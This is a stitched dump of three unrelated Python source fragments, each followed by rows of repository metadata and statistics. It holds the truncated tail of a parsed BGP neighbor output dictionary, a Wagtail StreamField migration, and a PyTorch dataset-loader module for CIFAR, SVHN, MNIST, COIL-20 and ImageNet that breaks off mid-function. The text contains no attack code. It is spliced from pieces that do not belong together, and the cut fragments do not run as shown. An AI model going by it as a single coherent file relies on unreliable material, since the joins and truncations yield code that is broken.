"update_group_member": 1,
},
"vpnv4 unicast": {
"advertise_bit": 1,
"bgp_table_version": 21,
"current_time": "0x13F886BA",
"dynamic_slow_peer_recovered": "never",
"extended_community_attribute_sent": True,
"index": 3,
"last_detected_dynamic_slow_peer": "never",
"last_read": "00:00:04",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"last_write": "00:00:28",
"local_policy_denied_prefixes_counters": {
"inbound": {
"af_permit_check": "n/a",
"bestpath_from_ibgp_peer": "n/a",
"bestpath_from_this_peer": "n/a",
"originator_loop": 8,
"total": 8,
},
"outbound": {
"af_permit_check": 4,
"bestpath_from_ibgp_peer": 4,
"bestpath_from_this_peer": 4,
"originator_loop": "n/a",
"total": 12,
},
},
"max_nlri": 1,
"min_nlri": 0,
"neighbor_version": "21/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_total": 4,
"used_as_bestpath": 0,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 4,
"prefixes_total": 8,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"session_state": "Established",
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"up_time": "3d21h",
"update_group_member": 3,
},
},
"bgp_event_timer": {
"next": {
"ackhold": "0x0",
"deadwait": "0x0",
"giveup": "0x0",
"keepalive": "0x0",
"linger": "0x0",
"pmtuager": "0x0",
"processq": "0x0",
"retrans": "0x0",
"sendwnd": "0x0",
"timewait": "0x0",
},
"starts": {
"ackhold": 6142,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 6139,
"sendwnd": 0,
"timewait": 0,
},
"wakeups": {
"ackhold": 6023,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 0,
"sendwnd": 0,
"timewait": 0,
},
},
"bgp_neighbor_session": {"sessions": 1},
"bgp_negotiated_capabilities": {
"enhanced_refresh": "advertised and received",
"four_octets_asn": "advertised and received",
"ipv4_unicast": "advertised and received",
"route_refresh": "advertised and received(new)",
"stateful_switchover": "NO for session 1",
"vpnv4_unicast": "advertised and received",
},
"bgp_negotiated_keepalive_timers": {
"hold_time": 180,
"keepalive_interval": 60,
},
"bgp_neighbor_counters": {
"messages": {
"in_queue_depth": 0,
"out_queue_depth": 0,
"received": {
"keepalives": 6139,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6154,
"updates": 14,
},
"sent": {
"keepalives": 6134,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6145,
"updates": 10,
},
}
},
"bgp_session_transport": {
"ack_hold": 200,
"address_tracking_status": "enabled",
"connection": {
"dropped": 0,
"established": 1,
"last_reset": "never",
},
"connection_state": "estab",
"connection_tableid": 0,
"datagram": {
"datagram_received": {
"out_of_order": 0,
"total_data": 118042,
"value": 12256,
"with_data": 6143,
},
"datagram_sent": {
"fastretransmit": 0,
"partialack": 0,
"retransmit": 0,
"second_congestion": 0,
"total_data": 117407,
"value": 12248,
"with_data": 6139,
},
},
"delrcvwnd": 1273,
"ecn_connection": "disabled",
"enqueued_packets": {
"input_packet": 0,
"mis_ordered_packet": 0,
"retransmit_packet": 0,
},
"fast_lock_acquisition_failures": 0,
"graceful_restart": "disabled",
"io_status": 1,
"ip_precedence_value": 6,
"irs": 2814267610,
"iss": 84959429,
"krtt": 0,
"lock_slow_path": 0,
"max_rtt": 1000,
"maximum_output_segment_queue_size": 50,
"maxrcvwnd": 16384,
"min_rtt": 1,
"min_time_between_advertisement_runs": 0,
"minimum_incoming_ttl": 0,
"option_flags": "nagle, path mtu capable",
"outgoing_ttl": 255,
"packet_fast_path": 0,
"packet_fast_processed": 0,
"packet_slow_path": 0,
"rcv_scale": 0,
"rcvnxt": 2814385653,
"rcvwnd": 15111,
"receive_idletime": 4619,
"rib_route_ip": "10.2.2.2",
"rtto": 1003,
"rtv": 3,
"sent_idletime": 4419,
"snd_scale": 0,
"sndnxt": 85076837,
"snduna": 85076837,
"sndwnd": 15681,
"srtt": 1000,
"sso": False,
"status_flags": "passive open, gen tcbs",
"tcp_path_mtu_discovery": "enabled",
"tcp_semaphore": "0x7F59978AAC10",
"tcp_semaphore_status": "FREE",
"transport": {
"foreign_host": "10.2.2.2",
"foreign_port": "43047",
"local_host": "10.5.5.5",
"local_port": "179",
"mss": 1396,
},
"unread_input_bytes": 0,
"uptime": 334847216,
},
"bgp_version": 4,
"link": "internal",
"remote_as": 65000,
"router_id": "10.2.2.2",
"session_state": "Established",
"shutdown": False,
},
}
}
},
}
| 48.427336 | 74 | 0.295917 | 1,626 | 27,991 | 4.730627 | 0.181427 | 0.020801 | 0.024961 | 0.031201 | 0.904706 | 0.895346 | 0.880525 | 0.880525 | 0.849324 | 0.849324 | 0 | 0.069752 | 0.61484 | 27,991 | 577 | 75 | 48.511265 | 0.643725 | 0 | 0 | 0.745234 | 0 | 0 | 0.27666 | 0.071237 | 0 | 0 | 0.003858 | 0 | 0 | 1 | 0 | false | 0.003466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5ddeacf0b678912db63dcdfc92ea537701633f37 | 9,270 | py | Python | mep/pages/migrations/0009_svg_extended_description.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | 3 | 2020-05-12T19:19:41.000Z | 2021-04-07T13:56:32.000Z | mep/pages/migrations/0009_svg_extended_description.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | 736 | 2017-06-21T16:24:42.000Z | 2022-02-26T17:46:10.000Z | mep/pages/migrations/0009_svg_extended_description.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.21 on 2019-12-19 14:40
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('pages', '0008_linkable_section_anchor_text'),
]
operations = [
migrations.AlterField(
model_name='contentlandingpage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))], blank=True),
),
migrations.AlterField(
model_name='contentpage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))]),
),
migrations.AlterField(
model_name='essaylandingpage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))], blank=True),
),
migrations.AlterField(
model_name='essaypage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))]),
),
migrations.AlterField(
model_name='homepage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))]),
),
]
| 206 | 1,671 | 0.733765 | 1,092 | 9,270 | 6.17033 | 0.104396 | 0.117542 | 0.166518 | 0.111309 | 0.94301 | 0.94301 | 0.94301 | 0.94301 | 0.94301 | 0.94301 | 0 | 0.00384 | 0.101079 | 9,270 | 44 | 1,672 | 210.681818 | 0.804752 | 0.007443 | 0 | 0.540541 | 1 | 0.135135 | 0.373451 | 0.003588 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.162162 | 0 | 0.243243 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f8d644a9c02bdea03699378f797eeb7af717bf5f | 40,397 | py | Python | data.py | jjYukgm/SSL_multi_decoder | ccd3ea888067a3d3e0c7754bcbdcd7139d1f9395 | [
"MIT"
] | null | null | null | data.py | jjYukgm/SSL_multi_decoder | ccd3ea888067a3d3e0c7754bcbdcd7139d1f9395 | [
"MIT"
] | null | null | null | data.py | jjYukgm/SSL_multi_decoder | ccd3ea888067a3d3e0c7754bcbdcd7139d1f9395 | [
"MIT"
] | null | null | null | import numpy as np
import torch
from torchvision.datasets import MNIST, SVHN, CIFAR10, STL10
from torchvision import transforms
import os
import torchvision.utils as vutils
# for coil
from PIL import Image
# from scipy import io
class DataLoader(object):
def __init__(self, config, raw_loader, indices, batch_size):
self.images, self.labels = [], []
for idx in indices:
image, label = raw_loader[idx]
self.images.append(image)
self.labels.append(label)
self.images = torch.stack(self.images, 0)
self.labels = np.array(self.labels, dtype=np.int64)
if config.num_label != 10 and config.dataset == 'cifar': # reorder the label
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
lbl_range.sort()
for i, j in enumerate(lbl_range):
self.labels[self.labels == j] = i
self.labels = torch.from_numpy(self.labels).squeeze()
if config.dataset == 'mnist':
self.images = self.images.view(self.images.size(0), -1)
self.batch_size = batch_size
self.unlimit_gen = self.generator(True)
self.len = len(indices)
def get_zca_cuda(self, reg=1e-6):
images = self.images.cuda()
if images.dim() > 2:
images = images.view(images.size(0), -1)
mean = images.mean(0)
images -= mean.expand_as(images)
sigma = torch.mm(images.transpose(0, 1), images) / images.size(0)
U, S, V = torch.svd(sigma)
components = torch.mm(torch.mm(U, torch.diag(1.0 / torch.sqrt(S) + reg)), U.transpose(0, 1))
return components, mean
def apply_zca_cuda(self, components):
images = self.images.cuda()
if images.dim() > 2:
images = images.view(images.size(0), -1)
self.images = torch.mm(images, components.transpose(0, 1)).cpu()
def generator(self, inf=False, shuffle=True):
while True:
indices = np.arange(self.images.size(0))
if shuffle:
np.random.shuffle(indices)
indices = torch.from_numpy(indices)
for start in range(0, indices.size(0), self.batch_size):
end = min(start + self.batch_size, indices.size(0))
ret_images, ret_labels = self.images[indices[start: end]], self.labels[indices[start: end]]
yield ret_images, ret_labels
if not inf: break
def next(self):
return next(self.unlimit_gen)
def get_iter(self, shuffle=True):
return self.generator(shuffle=shuffle)
def __len__(self):
return self.len
class DataBatchLoader(object):
def __init__(self, config, raw_loader, indices, batch_size,
transform=None, target_transform=None, img_side=224):
# todo: add str load img
self.folder_root = raw_loader.folder_root
self.images, self.labels = [], []
for idx in indices:
image, label = raw_loader[idx]
self.images.append(image)
self.labels.append(label)
self.images = np.array(self.images)
self.labels = np.array(self.labels, dtype=np.int64)
self.transform = transform
self.target_transform = target_transform
self.img_side = img_side
if config.num_label != 1000: # reorder the label
lbl_range = np.unique(self.labels)
for i, j in enumerate(lbl_range):
self.labels[self.labels == j] = i
self.labels = torch.from_numpy(self.labels).squeeze()
self.batch_size = batch_size
self.unlimit_gen = self.generator(True)
self.len = len(indices)
def generator(self, inf=False, shuffle=True):
while True:
indices = np.arange(self.images.shape[0])
if shuffle:
np.random.shuffle(indices)
# indices = torch.from_numpy(indices)
for start in range(0, indices.shape[0], self.batch_size):
end = min(start + self.batch_size, indices.shape[0])
ret_images = self.__loadimg(indices[start: end])
lab_ind = torch.from_numpy(indices[start: end])
ret_labels = self.labels[lab_ind]
yield ret_images, ret_labels
if not inf: break
def next(self):
return next(self.unlimit_gen)
def get_iter(self, shuffle=True):
return self.generator(shuffle=shuffle)
def __len__(self):
return self.len
def __loadimg(self, inds):
fns = self.images[inds]
images = []
for fn in fns:
path_to_data = os.path.join(self.folder_root, fn)
data = Image.open(path_to_data).convert('RGB') # HWC
data = data.resize((self.img_side, self.img_side), Image.ANTIALIAS) # ANTIALIAS;BILINEAR
# transforms
if self.transform is not None:
data = self.transform(data)
images.append(data)
images = torch.stack(images, 0)
return images
class coil20(CIFAR10):
"""`COIL20 <https://>`_ Dataset.
"""
base_folder = 'coil-20-proc'
url = "http://www.cs.columbia.edu/CAVE/databases/SLAM_coil-20_coil-100/coil-20/coil-20-proc.zip"
filename = "coil-20-proc.zip"
tgz_md5 = '464dec76a6abfcd00e8de6cf1e7d0acc' # tar.gz: 891c9b54622b6b676d91b54eae340c1b
class_names_file = ''
def __init__(self, root,
transform=None, target_transform=None, download=False, img_side=128):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.img_side = img_side
if download:
self.download2()
# if not self._check_integrity():
# raise RuntimeError(
# 'Dataset not found or corrupted. '
# 'You can use download=True to download it')
# now load the picked numpy arrays
self.data, self.labels = self.__loadfile()
class_file = os.path.join(
root, self.base_folder, self.class_names_file)
if os.path.isfile(class_file):
with open(class_file) as f:
self.classes = f.read().splitlines()
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.labels is not None:
img, target = self.data[index], int(self.labels[index])
else:
img, target = self.data[index], None
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return self.data.shape[0]
def __loadfile(self):
images = []
labels = np.arange(20, dtype=int).repeat(72)
data_pattern = lambda a, b: "obj{}__{}.png".format(a + 1, b) # a: [0,19]; b: [0,71]
for c in range(20): # 0-based
for i in range(72):
data_file = data_pattern(c, i)
path_to_data = os.path.join(self.root, self.base_folder, data_file)
data = Image.open(path_to_data).convert('RGB') # HWC
data = data.resize((self.img_side, self.img_side), Image.ANTIALIAS) # ANTIALIAS;BILINEAR
data = np.array(data)
data = np.expand_dims(data, axis=0)
images.append(data)
images = np.concatenate(images, axis=0)
# images = np.transpose(images, (0, 3, 1, 2))
# images = images / 255. # value:[0, 1]
return images, labels
def download2(self):
import zipfile
def download_url(url, froot, filename, md5):
import hashlib
import errno
from six import moves
def check_integrity(fpath_, md5_):
if not os.path.isfile(fpath_):
return False
md5o = hashlib.md5()
with open(fpath_, 'rb') as f:
# read in 1MB chunks
for chunk in iter(lambda: f.read(1024 * 1024 * 1024), b''):
md5o.update(chunk)
md5c = md5o.hexdigest()
if md5c != md5_:
return False
return True
froot = os.path.expanduser(froot)
fpath = os.path.join(froot, filename)
try:
os.makedirs(froot)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
# downloads file
if os.path.isfile(fpath) and check_integrity(fpath, md5):
print('Using downloaded and verified file: ' + fpath)
else:
print('Downloading ' + url + ' to ' + fpath)
moves.urllib.request.urlretrieve(url, fpath)
if self._check_integrity():
print('Files already downloaded and verified')
return
root = self.root
download_url(self.url, root, self.filename, self.tgz_md5)
# extract file
# cwd = os.getcwd()
zf = zipfile.ZipFile(os.path.join(root, self.filename), "r")
zf.extractall(root)
zf.close()
# os.chdir(cwd)
class imagenet10(CIFAR10):
"""`imagenet10 <https://>`_ Dataset.
"""
base_folder = 'imagenet'
foldernames = ["ILSVRC2012_img_train", "ILSVRC2012_img_val", "ILSVRC2012_img_test"]
def __init__(self, root, splitpart, target_transform=None):
self.root = os.path.expanduser(root)
self.target_transform = target_transform
self.data = []
self.labels = []
if "train" in splitpart:
data, labels = self.__loadfile(self.foldernames[0], "train")
self.data.append(data)
self.labels.append(labels)
if "val" in splitpart:
data, labels = self.__loadfile(self.foldernames[1], "val")
self.data.append(data)
self.labels.append(labels)
if "test" in splitpart:
data, labels = self.__loadfile(self.foldernames[2], "test")
self.data.append(data)
self.labels.append(labels)
self.data = np.concatenate(self.data, axis=0)
self.labels = np.concatenate(self.labels, axis=0)
self.folder_root = os.path.join(self.root, self.base_folder)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image_str, target) where target is index of the target class.
"""
if self.labels is not None:
img, target = self.data[index], int(self.labels[index])
else:
img, target = self.data[index], None
# doing this so that it is consistent with all other datasets
# to return a PIL Image
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return self.data.shape[0]
def __loadfile(self, foldername, labfname):
images = []
labels = []
fn = os.path.join(self.root, self.base_folder, "label", labfname+".txt")
fp = open(fn, "r")
for li in fp:
image, label = li.split(" ")
images.append(os.path.join(foldername, image))
labels.append(int(label[:-1])) # cut '\n'
fp.close()
return images, labels
def get_mnist_loaders(config):
transform = transforms.Compose([transforms.ToTensor()])
training_set = MNIST(config.data_root, train=True, download=True, transform=transform)
dev_set = MNIST(config.data_root, train=False, download=True, transform=transform)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=np.bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
for i in range(10):
mask[np.where(labels == i)[0][: config.size_labeled_data / 10]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[~ mask]
print 'labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0]
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size)
dev_loader = DataLoader(config, dev_set, np.arange(len(dev_set)), config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_svhn_loaders(config):
transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
training_set = SVHN(config.data_root, split='train', download=True, transform=transform)
dev_set = SVHN(config.data_root, split='test', download=True, transform=transform)
def preprocess(data_set):
for j in range(len(data_set.data)):
if data_set.labels[j][0] == 10:
data_set.labels[j][0] = 0
preprocess(training_set)
preprocess(dev_set)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=np.bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
for i in range(10):
mask[np.where(labels == i)[0][: config.size_labeled_data / 10]] = True
# labeled_indices, unlabeled_indices = indices[mask], indices[~ mask]
labeled_indices, unlabeled_indices = indices[mask], indices
print 'labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], 'dev size', len(
dev_set)
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size)
dev_loader = DataLoader(config, dev_set, np.arange(len(dev_set)), config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_cifar_loaders_test(config, lab_ind=True):
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 32: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
training_set = CIFAR10('cifar', train=True, download=True, transform=transform)
dev_set = CIFAR10('cifar', train=False, download=True, transform=transform)
indices = np.arange(len(training_set))
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=np.bool)
mask2 = np.zeros(indices.shape[0], dtype=np.bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
indices = indices[mask2]
dev_indices = dev_indices[mask3]
unlabeled_loader = DataLoader(config, training_set, indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(ind_path):
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
if config.num_label != 10:
# lbl: convert data_ind to unl_ind
mask = np.isin(indices, labeled_indices)
labeled_indices = np.arange(len(indices))
labeled_indices = labeled_indices[mask]
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, dev_loader
def get_cifar_loaders(config):
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
if hasattr(config, 'image_side') and config.image_side != 32: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 32: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform2 = transforms.Compose(tr_list)
training_set = CIFAR10('cifar', train=True, download=True, transform=transform)
dev_set = CIFAR10('cifar', train=False, download=True, transform=transform2)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=np.bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=np.bool)
mask2 = np.zeros(indices.shape[0], dtype=np.bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data / config.num_label]] = True
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = dev_indices[mask3]
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if os.path.exists(ind_path) or \
(hasattr(config, "train_step") and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(ind_path), "step {} Unknown label inds".format(config.train_step)
labeled_indices = np.load(ind_path)
